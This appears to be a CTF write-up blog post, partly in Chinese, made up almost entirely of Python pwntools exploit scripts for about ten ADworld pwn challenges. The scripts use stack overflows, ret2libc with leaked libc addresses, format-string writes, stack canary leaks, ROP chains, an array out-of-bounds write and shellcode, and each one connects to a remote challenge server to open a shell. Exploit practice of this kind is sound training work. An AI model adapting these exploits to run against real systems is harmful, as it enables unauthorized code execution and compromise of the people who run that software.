ADworld wp1


If you don’t go into the water, you can’t swim in your life

文中所用到的程序文件:bin file

cgpwn2

from pwn import *
context.arch = 'i386'

# p = process('./pwn')
p = remote('111.198.29.45',35993)
elf = ELF('./pwn')
main = elf.sym['main']
system_plt = elf.sym['system']
binsh = 0x0804A080
p.sendlineafter("name\n",'/bin/sh\x00')
payload = 'A'*42 + p32(system_plt) + p32(main) + p32(binsh)
p.sendlineafter('here:\n',payload)
sleep(1)
p.interactive()

forgot

from pwn import *
context.arch='i386'

# p = process('./pwn')
p = remote('111.198.29.45',32374)

flag = 0x080486CC
p.sendline('A'*63 + p32(flag))
sleep(1)
print p.recv()

int_overflow

from pwn import *
context.arch = 'i386'

# p = process('./pwn')
p = remote('111.198.29.45',53636)

p.sendlineafter('Your choice:','1')
p.sendafter('username:','asd')

payload = 'A'*0x18 + p32(ELF('./pwn').sym['what_is_this'])
# make the eip point to function 'what_is_this' by stack overflow
p.sendafter("passwd:",payload.ljust(256+4,'B'))
# function check_password use the rigister al to store the length of passwd
# when we input the length of passwd is 256(0xff),
# the rigister al could not store it, it will be zero(0)
# inorder to pass the judge(if ( v3 <= 3u || v3 > 8u )),
# we could intput the length of passwd is (256+3,256+8]
# then make stack overflow by fuction strcpy
p.recvuntil('Success\n')
print p.recv()

string

from pwn import *
context.arch = 'amd64'

# p = process('./pwn')
p = remote('111.198.29.45',53218)

print p.recvuntil('secret[0] is ')
a_0 = int(p.recvuntil('\n',drop=True),16)
log.info('a_0 = %#x',a_0)

p.sendlineafter("What should your character's name be:\n",'nop')
p.sendlineafter("So, where you will go?east or up?:","east")
p.sendlineafter("go into there(1), or leave(0)?:\n",'1')
p.sendlineafter("'Give me an address'\n",str(a_0))
p.sendlineafter("And, you wish is:\n",'%85c%7$n')
p.sendlineafter("Wizard: I will help you! USE YOU SPELL\n",asm(shellcraft.sh()))
sleep(1)
p.interactive()

level3

from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')

# simple stack over, but the file we get was tar.gz,
# winrar could not unzip successfully once

# p = process('./level3')
p = remote('124.126.19.106',33163)
elf = ELF('./level3',checksec=False)

write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']

p.recvuntil("Input:\n")
payload = 'A'*(0x88+4)
payload += flat([write_plt, main, 1, write_got, 8])
p.send(payload)
write_addr = u32(p.recv(4))
log.success("write_addr = %#x",write_addr)

libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success("system_addr = %#x, binsh = %#x"%(system_addr,binsh))

p.recvuntil("Input:\n")
payload = 'A'*(0x88+4)
payload += flat([system_addr, main, binsh])
p.send(payload)
sleep(0.1)
p.interactive()

Mary_Morton

from pwn import *
context(arch='amd64',os='linux')

# the program get us three function,
# one for leaking canary by fmt,
# one for control the program executtion flow by stack verflow
# one for read flag which was never called in the program

# p = process('../Mary_Morton')
p = remote('124.126.19.106',58817)

getshell = 0x00000000004008DA

print p.recvuntil('Exit the battle')
p.sendline('2')
p.send('%23$p')

canary = int(p.recvuntil("1. Stack Bufferoverflow Bug ",drop=True),16)
log.success('canary = %#x',canary)

p.recvuntil('Exit the battle')
p.sendline('1')
payload = 'A'*(0x90 - 8) + p64(canary) + 'B'*8 + p64(getshell)
p.send(payload)
# p.recvuntil('B'*8)
p.recv()
sleep(0.1)
print p.recv()
print p.recv()

pwn-100

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux',log_level='DEBUG')

# p = process('./pwn-100')
p = remote('124.126.19.106',50678)
elf = ELF('./pwn-100',checksec=False)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x00000000004006B8

pop_rdi = 0x0000000000400763 # pop rdi ; ret

payload = 'A'*(0x40 + 8)
payload += flat([pop_rdi, puts_got, puts_plt, main])
payload = payload.ljust(200,'\x90')
p.send(payload)

p.recvuntil('bye~\n')
puts_addr = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))
log.success('puts_addr = %#x',puts_addr)

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr, binsh))

payload = 'A'*(0x40 + 8)
payload += flat([pop_rdi, binsh, system_addr, main])
payload = payload.ljust(200,'\x90')
p.send(payload)
sleep(0.1)
p.interactive()

pwn-200

from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')

# p = process('./pwn-200')
p =remote('124.126.19.106',53404)
elf = ELF('./pwn-200',checksec=False)

write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x080484BE

p.recv()
payload = 'A'*(0x6c+4)
payload += flat([write_plt, main, 1, write_got, 8])
p.send(payload)

write_addr = u32(p.recv(4))
log.success('write_addr = %#x',write_addr)

libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr, binsh))

p.recv()
payload = 'A'*(0x6c +4)
payload += flat([system_addr, main, binsh])
p.send(payload)
sleep(0.1)
p.interactive()

stack2

未对数据边界检查,存在数组越界,可以任意地址写

      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;

利用这一点覆写栈中存储的返回地址,此处需要注意因为对齐,偏移为0x84, 此外题目环境没有/bin/bash, 所以不能直接使用程序中提供的函数(本地测试的时候可以)

from pwn import *

context(arch='i386',os='linux')

# p = process('./stack2')
p = remote('124.126.19.106',54932)
elf = ELF('./stack2',checksec=False)

system_plt = 0x08048450
sh = 0x08048987
hackhere = 0x0804859B


def change(index, value):
    p.recvuntil('5. exit')
    p.sendline('3')
    p.recvuntil("which number to change:\n")
    p.sendline(str(index))
    p.recvuntil("new number:\n")
    p.sendline(str(value))


p.recvuntil("How many numbers you have:")
p.sendline('1')
p.recvuntil("Give me your numbers")
p.sendline('2')

start = 0x84
# change(start, 0x9b)
# change(start+1, 0x85)
# change(start+2, 0x04)
# change(start+3, 0x08)
# # [+] Opening connection to 124.126.19.106 on port 54932: Done
# # [*] Switching to interactive mode

# # sh: 1: /bin/bash: not found

change(start, 0x50)
change(start+1, 0x84)
change(start+2, 0x04)
change(start+3, 0x08)

start += 8
change(start, 0x87)
change(start+1, 0x89)
change(start+2, 0x04)
change(start+3, 0x08)

p.recvuntil('5. exit')
p.sendline('5')
sleep(0.1)
p.interactive()

pwn1

from pwn import *
from LibcSearcher import *
context(arch='amd64',os="linux",log_level='DEBUG')

# p = process('./babystack')
p = remote('124.126.19.106',49614)
elf = ELF('./babystack',checksec=False)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# libc = ELF('./libc-2.23.so',checksec=False)
main = 0x0000000000400908
pop_rdi = 0x0000000000400a93 # pop rdi ; ret

# step1: leak canary
p.recvuntil(">> ")
p.send('1')
payload = 'A'*(0x90-0x8) + 'B'
p.send(payload)

p.recvuntil(">> ")
p.send('2')
p.recvuntil('B')
canary = u64('\x00'+p.recv(7))
log.success('canary = %#x',canary)
# pause()

#step2: leak libc_base
p.recvuntil(">> ")
p.send(str('1'))
payload = 'A'*(0x90-0x8) + p64(canary) + 'B'*0x8
payload += flat([pop_rdi, puts_got, puts_plt, main])
p.send(payload)

p.recvuntil(">> ")
p.send('3')
puts_addr = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))
log.success('puts_addr = %#x',puts_addr)
# pause()

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr,binsh))

# libc_base = puts_addr - libc.sym['puts']

# # step3: getshell

p.recvuntil(">> ")
p.send('1')
payload = 'A'*(0x90-0x8) + p64(canary) + 'B'*0x8
payload += flat([pop_rdi, binsh, system_addr, main])
# payload += flat([
#   pop_rdi, libc_base+libc.search('/bin/sh').next(), libc_base+libc.sym['system'], main])
p.send(payload)
p.recvuntil(">> ")
p.send('3')
sleep(0.1)
p.interactive()